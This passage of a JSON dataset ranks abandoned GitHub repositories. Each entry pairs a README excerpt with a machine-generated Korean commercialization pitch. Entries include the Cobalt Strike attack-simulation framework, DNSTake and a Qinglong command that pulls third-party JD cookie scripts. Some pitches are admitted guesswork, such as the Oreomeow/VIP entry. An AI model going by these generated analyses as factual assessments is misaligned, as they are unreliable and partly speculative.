simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors\". Cobalt Strike’s interactive post-exploit capabilities cover the full range of ATT&CK tactics, all executed within a single, integrated system.\nIn addition to its own capabilities, Cobalt Strike leverages the capabilities of other well-known tools such as Metasploit and Mimikatz. <strong>\n\n\nCobalt Strike MITRE TTPs </br>\nhttps://attack.mitre.org/software/S0154/\n\nCobalt Strike MITRE ATT&CK Navigator </br>\nhttps://mitre-attack.github.io/attack-navigator//#layerURL=https%3A%2F%2Fattack.mitre.org%2Fsoftware%2FS0154%2FS0154-enterprise-layer.json\n\n<h2>Hunting & Detection Tools</br></h2>\n\nHunt-Sleeping-Beacons</br>\nhttps://github.com/thefLink/Hunt-Sleeping-Beacons\n\nPointer - Cobalt Strike","composite_score":0.5078,"license_safety_tag":"safe"},{"name":"bazzite/statusfy","github_url":"https://github.com/bazzite/statusfy","stars":7,"language":"JavaScript","license":"Apache-2.0","abandonment_months":48,"description":"# bazzite/statusfy 분석\n\n## 왜 보물인가\n서비스가 정상 작동하는지 고객에게 실시간으로 알려주는 상태 페이지를 누구나 쉽게 만들 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n- **클라우드 서비스 회사**: AWS, 카카오 같은 기업이 자신들의 서버 상태를 고객에게 보여주는 대시보드\n- **전자상거래 플랫폼**: 쿠팡, 배달 앱 같은 서","readme_excerpt":"> ⚠️ No longer maintained!!!  Read this https://github.com/juliomrqz/statusfy/discussions/826\n\n<p align=\"center\">\n  <a href=\"https://www.npmjs.com/package/statusfy\" rel=\"nofollow\">\n    <img src=\"https://img.shields.io/npm/v/statusfy.svg\" alt=\"version\">\n  </a>\n  <a href=\"https://github.com/bazzite/statusfy/blob/develop/LICENSE\" rel=\"nofollow\">\n    <img src=\"https://img.shields.io/github/license/bazzite/statusfy.svg\" alt=\"License\">\n  </a>\n</p>\n\n\n<p align=\"center\">\n  <a href=\"https://statusfy.co?utm_source=github&utm_medium=readme&utm_campaign=statusfy\" target=\"_blank\">\n    <img src=\"https://raw.githubusercontent.com/bazzite/statusfy/develop/packages/docs/src/.vuepress/public/assets/img/statusfy-home-en.png\" alt=\"Statusfy\" />\n  </a>\n</p>\n\n# Statusfy\n\n> A marvelous Open Source Status Page system\n\nStatusfy is a Status Page System, easy to use and completely Open Source. You can easily create a fast System either [**Static Generated**](https://docs.statusfy.co/guide/architecture.html#static-","composite_score":0.5077,"license_safety_tag":"safe"},{"name":"adrianscheff/useful-sed","github_url":"https://github.com/adrianscheff/useful-sed","stars":15,"language":"","license":"unknown","abandonment_months":54,"description":"# adrianscheff/useful-sed 상용화 분석\n\n## 왜 보물인가\n복잡한 텍스트 처리 작업을 자동화하는 실용적인 도구 모음으로, 반복적인 데이터 정제 업무의 시간을 획기적으로 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 데이터 정제 SaaS 플랫폼**\n- 기업이 고객 데이터베이스, 로그 파일, 엑셀 데이터를 자동으로 정리하는 웹 ","readme_excerpt":"# Useful sed\n\nUseful sed tips, techniques and tricks for daily usage.\n\n# TABLE OF CONTENTS\n\n* [One liners with short explanation](#one-liners-with-short-explanation) :bulb:\n\n* [Short sed tut](#short-sed-tut) :books:\n\n* [About](#about)\n\n* [Please consider donating to support this type of content!](#buy-me-a-coffee) :pray:\n\n* [Credits](#credits-and-links)\n\n# Recommended books (not written by me)\n[Definitive Guide to sed - by Daniel Goldman](https://amzn.to/3cnzQCS)\n<br>\n[Sed & Awk - Dale Dougherty & Arnold Robbins](https://amzn.to/3kKck7Y)\n<br>\n[Effective awk programming - by Arnold Robbins](https://amzn.to/30scfhM)\n\n# More guides that I wrote\n[text-processing-recipes-linux](https://github.com/adrianscheff/text-processing-recipes-linux) - Comprehensive list of text processing tools and techniques. Featuring `vim, tr, cat, tac, sort, shuf, seq, pr, paste, fmt, cut, nl, split, csplit, sed, awk, grep and regex.`\n<br>\n[simple-awk](https://github.com/adrianscheff/simple-awk) - A simple but pr","composite_score":0.5076,"license_safety_tag":"unknown"},{"name":"redox-os/orbtk","github_url":"https://github.com/redox-os/orbtk","stars":6,"language":"Rust","license":"mit","abandonment_months":44,"description":"# OrbTk 프로젝트 분석\n\n## 왜 보물인가\n컴퓨터 화면에 버튼, 메뉴, 입력창 등을 쉽게 만들 수 있는 도구로, 새로운 프로그램 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 기반 디자인 도구 SaaS**: 웹 브라우저에서 직접 사용자 인터페이스를 시각적으로 만들고 저장하는 구독 서비스\n2. **기업 내부 업무 도","readme_excerpt":"## OrbTk is Sunsetting\n\nIt is with great sadness that I announce that OrbTk is sunsetting. In the many years since I first made OrbTk, the Rust GUI ecosystem has grown at an amazing rate. Toolkits with more features have developed, and which are more actively maintained. I first created this project to bootstrap UI development on Redox OS. Many of the applications on Redox use OrbTk. [@FloVanGH](https://github.com/FloVanGH) stepped in to do large refactoring between the 0.2 and 0.3 release, which modernized the OrbTk API. [@rzerres](https://github.com/rzerres) stepped in to add many features and maintain OrbTk since the 0.3 release.\n\nI have since moved on to working with [iced](https://iced.rs/). [@FloVanGH](https://github.com/FloVanGH) has taken a job working on [slint](https://slint-ui.com/). And [@rzerres](https://github.com/rzerres) has expressed interest in using [slint](https://slint-ui.com/) for their projects. Both [iced](https://iced.rs/) and [slint](https://slint-ui.com/) pro","composite_score":0.5076,"license_safety_tag":"safe"},{"name":"onmyway133/PushNotifications","github_url":"https://github.com/onmyway133/PushNotifications","stars":5,"language":"JavaScript","license":"NOASSERTION","abandonment_months":32,"description":"# PushNotifications 저장소 분석\n\n## 왜 보물인가\n모바일 앱 사용자에게 중요한 소식을 알림으로 보내는 기술을 쉽게 만들 수 있도록 정리해둔 참고 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **배달앱·커머스 SaaS**: 주문 상태 변화(주문 완료, 배달 시작, 도착 예상)를 실시간으로 고객에게 알려주는 알림 서비스\n2. **금융사 내부 ","readme_excerpt":"# ℙ𝕦𝕤𝕙 ℕ𝕠𝕥𝕚𝕗𝕚𝕔𝕒𝕥𝕚𝕠𝕟𝕤\n\n<a href=\"https://www.buymeacoffee.com/onmyway133\">\n\t\t<img alt=\"Buy Me A Coffee\" src=\"https://www.buymeacoffee.com/assets/img/custom_images/yellow_img.png\" style=\"height: auto !important; width: auto !important;\" />\n\t</a>\n\n❤️ Support my apps ❤️ \n\n- [Push Hero - pure Swift native macOS application to test push notifications](https://onmyway133.com/pushhero)\n- [PastePal - Pasteboard, note and shortcut manager](https://onmyway133.com/pastepal)\n- [Quick Check - smart todo manager](https://onmyway133.com/quickcheck)\n- [Alias - App and file shortcut manager](https://onmyway133.com/alias)\n- [My other apps](https://onmyway133.com/apps/)\n\n❤️❤️😇😍🤘❤️❤️\n\n<div align = \"center\">\n<img src=\"Screenshots/ios.png\" height=\"400\"/>\n</div>\n\n## Description\n\n- `PushNotitication` is an app used for testing push notifications on iOS and Android\n- Support macOS, Windows, Linux\n- Support using `certificate` and `token` for authentication with APNS\n- Auto save settings\n\n## How to install\n\n* Dow","composite_score":0.5076,"license_safety_tag":"unknown"},{"name":"Mukosame/Anime2Sketch","github_url":"https://github.com/Mukosame/Anime2Sketch","stars":28,"language":"Python","license":"MIT","abandonment_months":34,"description":"# Anime2Sketch 상용화 분석\n\n## 왜 보물인가\n애니메이션이나 만화 이미지를 손으로 그린 스케치 스타일로 자동 변환해주는 기술로, 창작자들의 작업 시간을 획기적으로 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **웹 기반 변환 서비스**: 만화가·일러스트레이터가 구독 방식으로 접속해 이미지를 업로드하면 스케치로 변환받는 SaaS 플랫폼\n","readme_excerpt":"# Anime2Sketch\n*Anime2Sketch: A sketch extractor for illustration, anime art, manga*\n\nBy [Xiaoyu Xiang](https://engineering.purdue.edu/people/xiaoyu.xiang.1)\n\n![teaser demo](demos/vinland_saga.gif)\n\n\n## Updates\n- 2022.1.14: Add Docker environment by [**kitoria**](https://github.com/kitoriaaa)\n- 2021.12.25: Update README. Merry Christmas!\n- 2021.5.24: Fix an interpolation error and a GPU inference error.\n- 2021.5.12: [Web Demo](https://gradio.app/g/AK391/Anime2Sketch) by [**AK391**](https://github.com/AK391)\n![gradio_web_demo](figures/gradiodemo.png)\n- 2021.5.2: Upload more example results of anime video.\n- 2021.4.30: Upload the test scripts. Now our repo is ready to run!\n- 2021.4.11: Upload the pretrained weights, and more test results.\n- 2021.4.8: Create the repo.\n\n## Introduction\nThe repository contains the testing codes and pretrained weights for Anime2Sketch.\n\nAnime2Sketch is a sketch extractor that works well on illustration, anime art, and manga. It is an application based on the","composite_score":0.5075,"license_safety_tag":"safe"},{"name":"ShunCai/QZoneExport","github_url":"https://github.com/ShunCai/QZoneExport","stars":5,"language":"JavaScript","license":"Apache-2.0","abandonment_months":39,"description":"# QZoneExport 분석 리포트\n\n## 왜 보물인가\nQQ의 개인 추억들(사진, 일기, 댓글)을 한 번에 자신의 컴퓨터로 저장할 수 있는 도구로, 플랫폼 종속성에서 벗어나 자신의 데이터를 지킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **개인 데이터 백업 서비스**: 중국 사용자의 QZone 추억을 클라우드에 자동 보관하는 월 구독형 서비스\n2. ","readme_excerpt":"# 公告公告\n\n天地是万物众生的客舍，光阴是古往今来的过客。\n\n青春，总会逝去，宴席，总会散场，助手也终将迎来落幕。\n\n即日起，项目归档，停止维护与更新。\n\n无不可抗力隐私，纯粹是因作者能力有限，且要抽时间撩妹脱单了。。。。。。\n\n\n# QQ空间导出助手\n\n一键快速备份QQ空间的说说、日志、日记、相册、视频、留言、好友、收藏、分享、访客为文件，便于迁移与保存。\n\n# 前言概述\n\n落叶随风，青春，稍纵即逝，QQ空间，一个承载了很多人的青春的地方。\n\n或许，是遗憾，毕竟，谁的青春没留遗憾呢，[《曾经沧海无限感慨，唯愿往事随风》](https://user.qzone.qq.com/20050606/blog/1559786793)。\n[![我是往事随风。你好，我是轻舞飞扬。](https://s1.ax1x.com/2020/05/16/YcekPP.gif)](https://v.qq.com/x/page/f08719wqfd0.html)\n\n或许，是害怕，曾经的青春变得不可控，毕竟，新浪博客相册、网易相册、腾讯微博等相继停运，无不意味着，互联网产品都有着自己的生命周期。\n\n于是，萌生了备份QQ空间的念头，也在互联网上找到一些工具与脚本，要么操作复杂、要么备份类型单一，于是乎，简单易用全类型备份的QQ空间导出助手诞生了。\n\n# 功能清单\n1、支持备份QQ空间文字说说、图文说说、语音说说、长说说，以及评论、点赞、最近访问\n\n2、支持备份QQ空间文字日志、图文日志、模板日志，以及评论、点赞、最近访问\n\n3、支持备份QQ空间文字日记、图文日记，以及评论、点赞、最近访问\n\n4、支持备份QQ空间相册/相片，以及相册/相片的评论、相册/相片的点赞、相册的最近访问\n\n5、支持备份QQ空间视频，以及评论、点赞、最近访问\n\n6、支持备份QQ空间留言寄语与留言、以及留言回复\n\n7、支持备份QQ好友、含好友成立时间、单向好友检测、空间访问权限检测、特别关心的好友等\n\n8、支持备份QQ空间分享内容，以及评论、点赞、最近访问\n\n9、支持备份QQ空间收藏内容\n\n10、支持备份QQ空间访客，仅支持备份谁访问了我，非全部备份，备份内容的多少，看是不是黄钻\n\n# 快速开始\n\n<span style=\"color:red\">**适用于老司机的简易核心教程，新手用户请跳转到[新手导航](#新手导航)**","composite_score":0.5075,"license_safety_tag":"safe"},{"name":"Hieromon/AutoConnect","github_url":"https://github.com/Hieromon/AutoConnect","stars":993,"language":"C++","license":"MIT","abandonment_months":23,"description":"# AutoConnect 상용화 분석\n\n## 왜 보물인가\nWiFi 연결을 자동으로 설정해주는 기술로, 사용자가 복잡한 네트워크 설정 없이도 IoT 기기나 스마트 장비를 바로 사용할 수 있게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 스마트홈 플랫폼이나 IoT 관리 서비스에서 초기 설정 자동화로 고객 만족도 향상\n- **내부 업무 ","readme_excerpt":"# AutoConnect for ESP8266/ESP32\n\n[![GitHub release](https://img.shields.io/github/v/release/Hieromon/AutoConnect)](https://github.com/Hieromon/AutoConnect/releases)\n[![Build Status](https://github.com/Hieromon/AutoConnect/actions/workflows/build.yml/badge.svg)](https://github.com/Hieromon/AutoConnect/actions/workflows/build.yml)\n[![arduino-library-badge](https://www.ardu-badge.com/badge/AutoConnect.svg?)](https://www.ardu-badge.com/AutoConnect)\n[![PlatformIO Registry](https://badges.registry.platformio.org/packages/hieromon/library/AutoConnect.svg?version=1.4.2)](https://registry.platformio.org/packages/libraries/hieromon/AutoConnect?version=1.4.2) \n[![License](https://img.shields.io/github/license/Hieromon/AutoConnect)](https://github.com/Hieromon/AutoConnect/blob/master/LICENSE)\n\nAn Arduino library for ESP8266/ESP32 WLAN configuration at run time with web interface. \n\n## Overview\n\nTo the dynamic configuration for joining to WLAN with SSID and PSK accordingly. It an Arduino library un","composite_score":0.5074,"license_safety_tag":"safe"},{"name":"ttglad/learning","github_url":"https://github.com/ttglad/learning","stars":5,"language":"JavaScript","license":"Apache-2.0","abandonment_months":27,"description":"# ttglad/learning 저장소 분석\n\n## 왜 보물인가\n학습 자료를 체계적으로 정리한 저장소로, 누구나 무료로 접근 가능한 교육 리소스입니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 교육 플랫폼**: 이 저장소의 학습 자료를 기반으로 인터넷 강의 사이트를 만들어 월 구독료를 받을 수 있습니다.\n2. **기업 내부 교육 도구**: 회사 직원들의","readme_excerpt":"# 学习\n### 警示，本插件为浏览器行为，近期有部分同学被警示，存在一定风险，建议大家自己学习。\n帮助一些成年人快乐地完成来自`学习强国`的学分，让更多时间思考人生的意义。\n\n## 下载\n* [最新发布](https://github.com/ttglad/learning/tree/master/release)\n\n## 安装方法\n* Chrome\n  * 应用商店：chrome应用商店可搜索 [`学习强国`](https://chrome.google.com/webstore/detail/%E5%AD%A6%E4%B9%A0/pdkhfkjcfgiemfbnabpdffjhfmocokbg?hl=zh-CN) 下载安装。\n  * 开发者模式：在地址栏输入 `chrome://extensions` 并回车，勾选 **开发者模式** -> **加载已解压的扩展程序**, 选择从 `Source code` 解压的 `release` 文件夹。可参考作者文章 [chrome插件manifest V3开发](https://www.jianshu.com/p/5464872fef93) 设置\n* QQ 浏览器\n    * 在地址栏输入 `qqbrowser://extensions/manage` 并回车，拖动 `*.crx` 文件到页面内。\n* 360 安全浏览器\n    * 在地址栏输入 `se://extensions` 并回车，拖动 `*.crx` 文件到页面内。\n* 360 极速浏览器\n    * 在地址栏输入 `chrome://myextensions/extensions` 并回车，拖动 `*.crx` 文件到页面内。\n* firefox   \n    * 搜索插件`学习强国助手`。\n\n## 使用方法\n* 桌面浏览器\n  * 在浏览器右上方的工具栏中，点击 ![iconv](https://github.com/ttglad/learning/blob/master/images/icon.png) 按钮来启动程序。\n  * 如果没有登录，请在打开的小窗口中进行登录。\n  * 等待打开的小窗口中的程序完成“学习”，期间你可以用这台电脑做其他事情，但不要 `最小化` 或 `关闭` 那个窗口。\n  * ![运行时图片](https://github.","composite_score":0.5074,"license_safety_tag":"safe"},{"name":"firmianay/security-paper","github_url":"https://github.com/firmianay/security-paper","stars":7,"language":"Python","license":"MIT","abandonment_months":50,"description":"# firmianay/security-paper 분석\n\n## 왜 보물인가\n보안 분야의 학술 자료와 실무 지식을 체계적으로 정리한 자료집으로, 보안 공부를 시작하는 사람들의 학습 곡선을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **기업 보안교육 SaaS**: 직원 보안 인식 교육을 제공하는 온라인 플랫폼의 커리큘럼 자료로 활용\n2. **보안","readme_excerpt":"# Security Papers\n\n**(与本人兴趣强相关的)各种安全or计算机资料收集，如侵权请联系我删除～**\n\n*book, manual, paper, blog, slides, report, course, survey，tool, online, video*\n\n## Architecture\n\n- *2014 manual* [ARM_Architecture_Reference_Manual_ARMv7-A_and_ARMv7-R_edition](Architecture/ARM_Architecture_Reference_Manual_ARMv7-A_and_ARMv7-R_edition)\n- *2019 manual* [Arm_Architecture_Reference_Manual](Architecture/Arm_Architecture_Reference_Manual)\n- *2019 manual* [Intel_64_and_IA-32_Architectures_Software_Developers_Manual](Architecture/Intel_64_and_IA-32_Architectures_Software_Developers_Manual)\n- *2017 slides* [A_tour_of_the_ARM_architecture_and_its_Linux_support](Architecture/A_tour_of_the_ARM_architecture_and_its_Linux_support)\n\n## Reverse Engineering\n\n- *2005 book* [Reversing_Secrets_of_Reverse_Engineering](Reverse-Engineering/Reversing_Secrets_of_Reverse_Engineering)\n- *2016 book* [anti-reverse-engineering-linux](Reverse-Engineering/anti-reverse-engineering-linux)\n- *2016 paper* [An_In-Depth_Analysis_of_Disassembly_o","composite_score":0.5074,"license_safety_tag":"safe"},{"name":"aldaor/HackerOneReports","github_url":"https://github.com/aldaor/HackerOneReports","stars":8,"language":"","license":"unknown","abandonment_months":53,"description":"# HackerOneReports 저장소 분석\n\n## 왜 보물인가\n해킹 취약점 정보를 체계적으로 모아둔 이 저장소는 보안 문제를 미리 파악하고 대비하려는 기업들에게 매우 유용한 참고 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **보안 컨설팅 SaaS**: 기업의 보안 취약점을 자동 진단해주는 온라인 서비스로 판매\n2. **내부 보안 교육 플랫폼**: 직원","readme_excerpt":"# HackerOneReports\nHere you can find mostly all disclosed h1 reports up to 02/01/2020\n\nIf you have any questions or improvements to the structured data please do not hesitate to ask or suggest.\n","composite_score":0.5073,"license_safety_tag":"unknown"},{"name":"developit/htm","github_url":"https://github.com/developit/htm","stars":6,"language":"JavaScript","license":"Apache-2.0","abandonment_months":28,"description":"# developit/htm 상업화 분석\n\n## 왜 보물인가\n웹 개발자들이 복잡한 코드 없이 동적인 웹페이지를 빠르게 만들 수 있도록 하는 경량 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 웹 기반 프로토타입 빌더 플랫폼으로, 기업이 코딩 없이 내부 관리 도구를 직접 만들 수 있게 제공\n2. **내부 업무 도구**: 중소 IT 회","readme_excerpt":"\n<h1 align=\"center\">\n  HTM (Hyperscript Tagged Markup)\n  <a href=\"https://www.npmjs.org/package/htm\"><img src=\"https://img.shields.io/npm/v/htm.svg?style=flat\" alt=\"npm\"></a>\n</h1>\n<p align=\"center\">\n  <img src=\"https://i.imgur.com/0ph8dbS.png\" width=\"572\" alt=\"hyperscript tagged markup demo\">\n</p>\n\n`htm` is **JSX-like syntax in plain JavaScript** - no transpiler necessary.\n\nDevelop with React/Preact directly in the browser, then compile `htm` away for production.\n\nIt uses standard JavaScript [Tagged Templates] and works in [all modern browsers].\n\n## `htm` by the numbers:\n\n🐣 **< 600 bytes** when used directly in the browser\n\n⚛️ **< 500 bytes** when used with Preact _(thanks gzip 🌈)_\n\n🥚 **< 450 byte** `htm/mini` version\n\n🏅 **0 bytes** if compiled using [babel-plugin-htm]\n\n\n## Syntax: like JSX but also lit\n\nThe syntax you write when using HTM is as close as possible to JSX:\n\n- Spread props: `<div ...${props}>` instead of `<div {...props}>`\n- Self-closing tags: `<div />`\n- Components: `<$","composite_score":0.5073,"license_safety_tag":"safe"},{"name":"vanyouseea/o365","github_url":"https://github.com/vanyouseea/o365","stars":5,"language":"CSS","license":"MIT","abandonment_months":34,"description":"# vanyouseea/o365 분석 보고서\n\n## 왜 보물인가\nMicrosoft 365(업무 문서/메일/협업 도구)를 자동으로 연동하는 기술이라 많은 회사들이 필요로 하는 핵심 인프라입니다.\n\n## 어디에 쓸 수 있나\n\n1. **업무 자동화 SaaS 서비스**: 회사의 메일·일정·문서를 자동으로 정리하고 알려주는 AI 비서 앱\n2. **회계팀 내부 도구*","readme_excerpt":"# o365\nO365管理系统是一个以java语言开发的基于Microsoft Graph Restful API的多全局管理系统，理论上支持任何Office全局的管理(A1,A3,A1P,E3,E5等)，你可以很方便的使用它来批量添加，批量删除，批量启用，批量禁用，搜索和查看用户，绑定解绑域名，生成邀请码，邀请朋友注册，提升和收回管理员权限，更新密钥，查看订阅，分配订阅(创新用户时)，查看单全局或多全局报告，登录同时需要微信许可（此功能默认关闭）\n\n## 最低环境需求\n| 类型 | - |\n| ---- | ----|\n| CPU | 1C |\n| RAM | 0.75G |\n| 硬盘 | 5GB |\n\n## heroku已不支持免费部署，故而删除体验网址  \n## ~~体验o365 in heroku~~  \n~~o365已部署于heroku,你可以访问以下路径体验最新版的o365,你也可以将工程fork到自己的仓库用自己的heroku账号进行部署（推荐）~~  \n~~https://oo365.herokuapp.com~~  \n  \n~~**特别提示**~~  \n~~heroku 超过30分钟不被访问数据就会被销毁，所以仅能用来体验o365的功能，有需求的话还是建议部署到自己的VPS，群晖或者杜甫上~~  \n\n\n## 功能介绍\n### 首页预览  \n  ![alt 首页](https://github.com/vanyouseea/o365/blob/master/pic/001.PNG)\n  登录后请根据首页介绍，先创建APP，然后赋予以下权限，需要注意的是，API权限请务必选择**应用程序**\n  | API名 | 大致作用 |\n  | ---- | ----|\n  | Application.ReadWrite.All | 用于新增密钥的功能 |\n  | Application.ReadWrite.OwnedBy | 用于新增密钥的功能 |\n  | Directory.ReadWrite.All | 用于订阅，域名，用户管理的功能 |\n  | RoleManagement.ReadWrite.Directory | 用于特权角色的管理 |\n  | User.ManageIdentities.All | 用于用户的管理 |\n  | User.ReadWr","composite_score":0.5072,"license_safety_tag":"safe"},{"name":"rnosov/react-reveal","github_url":"https://github.com/rnosov/react-reveal","stars":6,"language":"JavaScript","license":"mit","abandonment_months":39,"description":"# react-reveal 평가 보고서\n\n## 왜 보물인가\n웹사이트에 방문자가 스크롤할 때 요소들이 부드럽게 나타나는 효과를 쉽게 만들 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **포트폴리오 웹사이트 SaaS**: 디자이너/개발자들이 자신의 작품을 돋보이게 표현할 수 있는 웹사이트 빌더 서비스\n2. **마케팅 랜딩페이지 제작 도구**: 기업의 ","readme_excerpt":"# React Reveal\n\n[React Reveal](https://www.react-reveal.com/) is\nan animation framework for React. It's MIT licensed, has a tiny footprint\nand written specifically for React in ES6. It can be used to create various cool reveal\non scroll animations in your application.\nIf you liked this package, don't forget to star\nthe [Github repository](https://github.com/rnosov/react-reveal).\n\n## Live Examples\n\nA number of simple effect examples:\n- [Fade](https://www.react-reveal.com/examples/common/fade/)\n- [Flip](https://www.react-reveal.com/examples/common/flip/)\n- [Rotate](https://www.react-reveal.com/examples/common/rotate/)\n- [Zoom](https://www.react-reveal.com/examples/common/zoom/)\n- [Bounce](https://www.react-reveal.com/examples/common/bounce/)\n- [Roll](https://www.react-reveal.com/examples/common/roll/)\n\nAlso, there are more complicated examples of [animated form errors](https://www.react-reveal.com/examples/advanced/form/) and a [todo app](https://www.react-reveal.com/examples/advanced/to","composite_score":0.5072,"license_safety_tag":"safe"},{"name":"Oreomeow/VIP","github_url":"https://github.com/Oreomeow/VIP","stars":8,"language":"Shell","license":"unknown","abandonment_months":42,"description":"# Oreomeow/VIP 분석\n\n## 왜 보물인가\n정확한 설명 정보가 부족하여 현재로서는 이 프로젝트의 핵심 가치를 파악하기 어렵습니다. GitHub 저장소의 README 파일을 확인하거나 개발자에게 직접 문의하여 프로젝트의 목적을 명확히 할 필요가 있습니다.\n\n## 어디에 쓸 수 있나\n**1. SaaS 서비스**: 프로젝트명 \"VIP\"가 멤버십 또는 우","readme_excerpt":"# Statement\n\n***This repository is for personal study and research purposes only.***  \n**Please DO NOT USE IT FOR COMMERCIAL PURPOSES.**  \n***Violators are responsible for their own.***  \n**☣REFUSE to SPREAD☣**\n***Thank you for your cooperation.***\n\n## [★](./Dict) Dictionaries\n\n### Learning-Markdown\n\n> [README](https://github.com/Oreomeow/README#readme)  \n> [GFM](https://592592.xyz/2020/Github_Flavored_Markdown/#%E7%9B%AE%E5%BD%95)\n\n### Docker\n\n> [Docker Tutorials | Rookie Tutorials](https://www.runoob.com/docker/docker-tutorial.html)  \n\n## [★](./Conf) Configurations  \n\n- [Env](./Conf#readme)\n- [config.sample.sh](./Conf/Qinglong/config.sample.sh)\n\n## [★](./Tasks) Tasks\n\n### [<img src=\"/Icons/qinglong/QL.png\" title=\"QL\" width=\"30\" height=\"30\" />][QL] ← More\n\n```sh\nql repo https://github.com/shufflewzc/faker2.git \"jd_|jx_|gua_|jddj_|getJDCookie\" \"activity|backUp|Coupon|update\" \"^jd[^_]|USER|utils|function|^JS|^TS|^JDJRValidator_Pure|^ZooFaker|^sign|ql\"\n```\n\n- [extra.sh](./Tasks/qlrepo/ex","composite_score":0.5072,"license_safety_tag":"unknown"},{"name":"sustrik/libdill","github_url":"https://github.com/sustrik/libdill","stars":12,"language":"C","license":"mit","abandonment_months":26,"description":"# libdill 프로젝트 분석\n\n## 왜 보물인가\n프로그램들이 여러 작업을 동시에 처리할 때 발생하는 복잡한 문제를 간단하게 해결해주는 기초 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **채팅·실시간 협업 SaaS**: 수천 명의 사용자가 동시에 연결될 때 서버가 빠르게 응답하도록 지원\n2. **IoT 기기 관리 플랫폼**: 수만 개의 센서·카메라에서 ","readme_excerpt":"# libdill: Structured Concurrency for C\n\n[![Build Status](https://travis-ci.org/sustrik/libdill.svg?branch=master)](https://travis-ci.org/sustrik/libdill)\n\n## Documentation\n\nFor the documentation check the project website:\n\nhttp://libdill.org\n\n## License\n\nLibdill is licensed under MIT/X11 license.\n","composite_score":0.5071,"license_safety_tag":"safe"},{"name":"peng-zhihui/CycloidAcuratorNano","github_url":"https://github.com/peng-zhihui/CycloidAcuratorNano","stars":5,"language":"","license":"unknown","abandonment_months":47,"description":"# CycloidAcuratorNano 분석 리포트\n\n## 왜 보물인가\n정밀한 기계 제어가 필요한 소형 로봇이나 자동화 장비를 저비용으로 만들 수 있는 설계 도면 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 소형 로봇 제어 소프트웨어 구독 서비스로, 사용자가 온라인으로 로봇의 움직임을 원격 조정하고 모니터링\n2. **내부 업무 도구","readme_excerpt":"# CycloidAcuratorNano\n\n> https://www.bilibili.com/video/BV1iU4y1T7fv\n>\n> \n\n电机型号：2204无刷电机\n\n轴承型号：6705x2、MR106x2、MR74x14\n\n![](https://pengzhihui-markdown.oss-cn-shanghai.aliyuncs.com/img/20211127220034.jpg)\n\n","composite_score":0.5071,"license_safety_tag":"unknown"},{"name":"pomber/code-surfer","github_url":"https://github.com/pomber/code-surfer","stars":7,"language":"JavaScript","license":"MIT","abandonment_months":37,"description":"# Code Surfer 분석 보고서\n\n## 왜 보물인가\n프로그래밍 강의나 기술 설명을 동영상처럼 자동으로 만들어주는 도구로, 복잡한 코드를 쉽게 시각화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 SaaS**: 프로그래밍 학원이나 코딩 교육 플랫폼에서 강의 자료 제작 자동화\n2. **기업 교육 도구**: IT 회사의 신입 직원 온보딩 ","readme_excerpt":"<div align=\"center\">\n<br/>\n<a href=\"https://codesurfer.pomb.us/demo/\">\n<img alt=\"demo\" src=\"https://user-images.githubusercontent.com/1911623/66186294-49bacc00-e658-11e9-8d73-e4e6d8df476b.gif\" width=\"600\" />\n</a>\n<br/>\n</div>\n\n# Code Surfer\n\n> Help to keep this project alive with your [support](https://opencollective.com/code-surfer) ❤️\n\nCode Surfer adds code highlighting, code zooming, code scrolling, code focusing, code morphing, and fun to [MDX Deck](https://github.com/jxnblk/mdx-deck) slides.\n\nTo create a new project run:\n\n```bash\nnpm init code-surfer-deck my-deck\ncd my-deck\nnpm start\n```\n\n## Examples\n\n- [Formidable's GraphQL Workshop](https://advanced-graphql-workshop.netlify.com/) by [Phil Pluckthun](https://twitter.com/_philpl)\n- [React Conf 2018 Hooks Demo](https://github.com/pomber/react-conf-2018-hooks-demo)\n\n## How to use Code Surfer\n\n> It may help to know how [MDX Deck](https://github.com/jxnblk/mdx-deck) works first\n\nTo use Code Surfer you need to import it and wrap the co","composite_score":0.5071,"license_safety_tag":"safe"},{"name":"pwnesia/dnstake","github_url":"https://github.com/pwnesia/dnstake","stars":200,"language":"Go","license":"MIT","abandonment_months":40,"description":"# DNSTake 저장소 분석\n\n## 왜 보물인가\n인터넷 주소(도메인) 관리에서 놓친 보안 허점을 자동으로 찾아주는 도구라 사이버 보안 업체들이 매우 필요로 합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업의 도메인 보안을 정기적으로 점검하고 위험 알림을 보내는 월간 구독 서비스\n- **내부 업무 도구**: 대형 IT 회사나 클라우드 제","readme_excerpt":"# DNSTake\n\n<img src=\"https://user-images.githubusercontent.com/25837540/131214165-06cb74c3-2754-48a6-a13d-bfcf592e646a.png\" width=\"480\" alt=\"DNSTake\" title=\"DNSTake\">\n\nA fast tool to check missing hosted DNS zones that can lead to subdomain takeover.\n\n---\n\n\n## What is a DNS takeover?\n\nDNS takeover vulnerabilities occur when a subdomain (subdomain.example.com) or domain has its authoritative nameserver set to a provider (e.g. AWS Route 53, Akamai, Microsoft Azure, etc.) but the hosted zone has been removed or deleted. Consequently, when making a [request for DNS records](https://www.diggui.com/#type=A&hostname=github.technology&nameserver=public&public=8.8.8.8&specify=&clientsubnet=&tcp=def&transport=def&mapped=def&nssearch=def&trace=def&recurse=def&edns=def&dnssec=def&subnet=def&cookie=def&all=def&cmd=def&question=def&answer=def&authority=def&additional=def&comments=def&stats=def&multiline=def&short=def&colorize=on) the server responds with a `SERVFAIL` error. This allows an attacker t","composite_score":0.507,"license_safety_tag":"safe"},{"name":"NVIDIA/flowtron","github_url":"https://github.com/NVIDIA/flowtron","stars":6,"language":"Jupyter Notebook","license":"Apache-2.0","abandonment_months":35,"description":"# 